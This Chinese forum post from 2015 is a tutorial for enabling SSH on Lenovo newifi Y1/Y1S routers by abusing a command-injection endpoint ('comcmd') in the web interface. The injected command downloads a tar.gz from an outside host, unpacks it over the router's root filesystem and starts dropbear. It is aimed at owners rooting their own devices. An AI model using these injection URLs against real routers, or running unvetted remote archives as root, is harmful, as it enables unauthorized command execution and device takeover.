admin 发表于 2015-10-16 23:17:27

联想newifi(Y1S)newifi mini(Y1)免刷机开启SSH教程

更新日志:

经确认,Y1S的新固件1.6.9.6对新的接口进行了封堵,估计之后的固件都会封堵此类接口。好吧,你们赢了。目前要在新的固件中获得路由器的root权限,可以参考@lijiwe24的帖子,利用百度samba共享插件的一个漏洞(相信很多快也会被封堵),或者直接下载论坛中已经root好的固件。

支持1.6.8.x及以上固件,对Y1和Y1S继续有效
联想newifi(Y1S)newifi mini(Y1)新的固件中都屏蔽了SSH后台登录功能。这里介绍一个不刷机、不重起、重起也不失效的超级简单、超级小白、绿色环保的开启SSH后台登录方法。整个过程只需要通过浏览器连续输入三个地址即可完成(其中有一个是用来测试的,实际上只要两步就够了)。
1. 打开浏览器,输入http://192.168.99.1,在登陆页面成功登陆后,出现下图,把红框中的字符串复制出来,用以替换第二步和第三步URL中的stok=xxxxxxxxx部分。每次登录地址栏中的这串字符都是不同的,请记下自己浏览器中出现的字符串。不懂的仔细看图。

2. (可选步骤,还是做一下吧)在浏览器地址栏中继续输入:
a) 1.6.8.x之前的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/xcloud/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/README.txtb) 1.6.8.x及之后的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/newwifi/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/README.txt如果出现下图一样的结果,请继续下一步;如果不是,请仔细检查网络设置,并重复第一步和第二步,直到出现下图的结果为止。

3. 继续在浏览器地址栏中继续输入:
a) 1.6.8.x之前的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/xcloud/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/hacknewifi.tar.gz|tar%20-C%20/%20-zxvf-%26%26/etc/init.d/dropbear%20startb) 1.6.8.x及之后的固件
http://192.168.99.1/cgi-bin/luci/;stok=请将我替换成第一步中提取出来的字符串/admin/newwifi/comcmd?cmd=wget%20-O-%20http://xunkutech.qiniudn.com/hacknewifi.tar.gz|tar%20-C%20/%20-zxvf-%26%26/etc/init.d/dropbear%20start
好了,现在甚至不用重起就可以用putty等ssh客户端工具连接Y1和Y1 mini了。

注意:
1、开启SSH后台登录会增加路由器的安全风险,务必谨慎使用;
2、路由器重起后,SSH后台登录还会继续有效;
3、路由器在恢复出厂设置后,SSH后台登录将会失效,但可以用同样的步骤再次开启;
页: [1]
查看完整版本: 联想newifi(Y1S)newifi mini(Y1)免刷机开启SSH教程